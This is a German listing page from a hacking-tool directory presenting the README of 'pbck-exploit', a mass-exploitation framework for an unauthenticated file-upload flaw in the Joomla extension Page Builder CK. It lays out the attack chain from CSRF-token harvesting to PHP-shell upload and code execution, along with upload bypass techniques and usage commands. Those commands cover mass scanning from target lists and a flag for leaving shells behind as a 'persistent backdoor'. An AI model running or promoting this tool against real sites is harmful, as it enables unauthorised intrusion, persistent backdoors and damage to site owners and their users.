Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pbck-exploit — 📤 Massen-Exploitation-Framework für CVE-2026-56290 — Page Builder CK Joomla unauthentifizierter Datei-Upload zu RCE | Kitploit
Tools/GitHubGitHub/shinthink/pbck-exploit
AufklärungSchwachstellenscannerExploit-FrameworksWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubshinthink/pbck-exploit

pbck-exploit

📤 Massen-Exploitation-Framework für CVE-2026-56290 — Page Builder CK Joomla unauthentifizierter Datei-Upload zu RCE

Repository anzeigen
315vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PBCK-Exploit — CVE-2026-56290 Joomla Page Builder CK Exploit

Python CVE License

Discovery CSRF RCE Cleanup Live

Massen-Exploit- & Validierungsframework für Joomla Page Builder CK

Unauthenticated Arbitrary File Upload → Remote Code Execution



📑 Inhaltsverzeichnis

  • Schwachstellenübersicht
  • Betroffene Versionen
  • Funktionen
  • Installation
  • Nutzung
  • Proof of Concept
  • Technische Tiefenbohrung
  • Erkennungsmethodik
  • Verteidigung & Abmilderung
  • Haftungsausschluss
  • Referenzen

🔴 Schwachstellenübersicht

CVE-2026-56290 ist eine kritische Schwachstelle in Page Builder CK (com_pagebuilderck), einer beliebten Joomla-Seitenbauerweiterung. Die Controller-Methode browse.ajaxAddPicture akzeptiert nicht authentifizierte Datei-Uploads mit einem benutzergesteuerten Zielpfad, sodass Angreifer beliebige PHP-Dateien in webzugängliche Verzeichnisse schreiben können.

Die Ursache

// browse.php controller — KEINE Authentifizierungsprüfung
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← benutzergesteuerte Datei
    $path  = trim($input->get('path', ''));       // ← benutzergesteuerter Pfad, nur trim()!
    // ... lädt Datei in $path hoch, ohne das Ziel zu validieren
}

Der Parameter path wird nur mit trim() bereinigt — keine Whitelist, keine Verzeichnisüberschreitungsprüfung, kein Authentifizierungsgate. Kombiniert mit einem CSRF-Token, der von jeder Joomla-Seite öffentlich abrufbar ist, können Angreifer ferngesteuert PHP-Shells in jedes beschreibbare Verzeichnis hochladen.

Auswirkungen

VektorSchweregradAuswirkung
Unauthenticated File Upload9.8 (Kritisch)Beliebige PHP-Codeausführung
CSRF-Token-Ernte5.3 (Mittel)Ermöglicht die Upload-Kette
Informationsoffenlegung5.3 (Mittel)Versions-Fingerprinting der Erweiterung

Die Angriffskette

1. AUFRUF Joomla-Startseite  →  Ernte CSRF-Token (hex32 + Wert "1")
2. POST Datei-Upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP-Shell landet in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET Shell-URL             →  Code wird ausgeführt, RCE bestätigt
5. POST f=@file an Shell     →  Weitere Tools hochladen
6. GET ?cleanup=1            →  Shell zerstört sich selbst

🟠 Betroffene Versionen

Page Builder CK VersionStatusAnmerkungen
3.1.1 und niedriger🔴 AngreifbarBestätigter unauthentifizierter Upload
3.4.10 und niedriger🔴 AngreifbarErweiterter Bereich laut Analyse
3.5.10 und niedriger🔴 AngreifbarEinige gepatchte Varianten möglich
> 3.5.10🟢 Möglicherweise gepatchtÜber Manifest XML prüfen

Hinweis: Die Version wird aus der Joomla-Manifestdatei unter /administrator/manifests/files/com_pagebuilderck.xml erkannt. Wenn das Manifest nicht zugänglich ist, geht der Scanner standardmäßig davon aus, dass das Ziel potenziell angreifbar ist.


✨ Funktionen

🔍 Aufklärung

  • Joomla-Erkennung — 2-phasig: HTML-Fingerabdrücke + Admin-Panel-Untersuchung
  • PBCK-Erkennung — Direkte Pfaduntersuchungen + HTML-Musterabgleich
  • Versionsextraktion — Manifest-XML-Parsing + HTML-Regex-Rückfall
  • CSRF-Token-Ernte — Mehrseitige Token-Extraktion (Startseite, Login, Registrierung, Admin)
  • Endpoint-Brute-Force — 1000+ Aufgaben-/Parameter-/Pfadkombinationen mit zeitgebundener Entdeckung

💀 Ausnutzung

  • 40+ Erweiterungsbypässe — Groß-/Kleinschreibungsveränderung, nummerierte Varianten, doppelte Erweiterungen, Windows-Tricks
  • 20+ Zielpfade — Erweiterungsverzeichnisse, Joomla-beschreibbare Verzeichnisse, Überschreitungspfade
  • Shell-Validierung — Token-basierte Bestätigung, dass PHP ausgeführt wird
  • Automatische Bereinigung — Shells zerstören sich nach Validierung selbst (?cleanup=1)
  • Live-TXT-Ausgabe — Echtzeitausgabe threadsicher in Datei geschrieben
  • JSON-Bericht — Strukturierter Bericht mit vollständigen Details pro Ziel

📦 Installation

# Repository klonen
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Abhängigkeiten installieren
pip install -r requirements.txt

# Überprüfen
python cve_2026_56290.py --help

Anforderungen

requests>=2.28.0
urllib3>=1.26.0

📖 Nutzung

Kommandozeilenargumente

CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Massen-Exploit & Validator

  -t, --target        Einzelne Ziel-URL
  -f, --file          Datei mit Ziel-URLs (eine pro Zeile, # für Kommentare)
  -o, --output        Live-TXT-Ausgabedatei (Standard: cve-2026-56290_live.txt)
  --json              JSON-Berichtsdateipfad (Standard: cve-2026-56290_report.json)
  --threads           Gleichzeitige Arbeiter (Standard: 20)
  --timeout           Zeitüberschreitung für Anfragen in Sekunden (Standard: 15)
  --no-cleanup        Shells auf dem Ziel belassen (persistente Hintertür)
  -v, --verbose       Ausführliche Endpunkt-Entdeckungsausgabe
  --known-endpoint    Entdeckung überspringen: Aufgabe, Dateiparameter, Ordnerparameter

Grundlegende Nutzung

# Einzelnes Ziel
python cve_2026_56290.py -t https://ziel.com

# Massenscan aus Datei
python cve_2026_56290.py -f targets.txt

# Benutzerdefinierte Ausgabe + ausführlich
python cve_2026_56290.py -f targets.txt -o ergebnisse.txt -v

# Shells hinterlassen (persistente Hintertür)
python cve_2026_56290.py -t https://ziel.com --no-cleanup

# Entdeckung mit bekanntem Endpunkt überspringen
python cve_2026_56290.py -t https://ziel.com --known-endpoint "browse.ajaxAddPicture,file,path"

Format der Zieldatei

# targets.txt
ziel-eins.com
https://ziel-zwei.com/unterverzeichnis
192.168.10.100
# Kommentare und leere Zeilen werden ignoriert

🧪 Proof of Concept

Szenario 1: Massenscan mit Live-Ausgabe

$ python cve_2026_56290.py -f targets.txt -o live_ergebnisse.txt
────────────────────────────────────────────────────────────
  CVE-2026-56290 | 5 Ziele | 20 Threads | Bereinigung=ja
  Live TXT: live_ergebnisse.txt
  2026-07-04 15:30:00
────────────────────────────────────────────────────────────
Tool herunterladen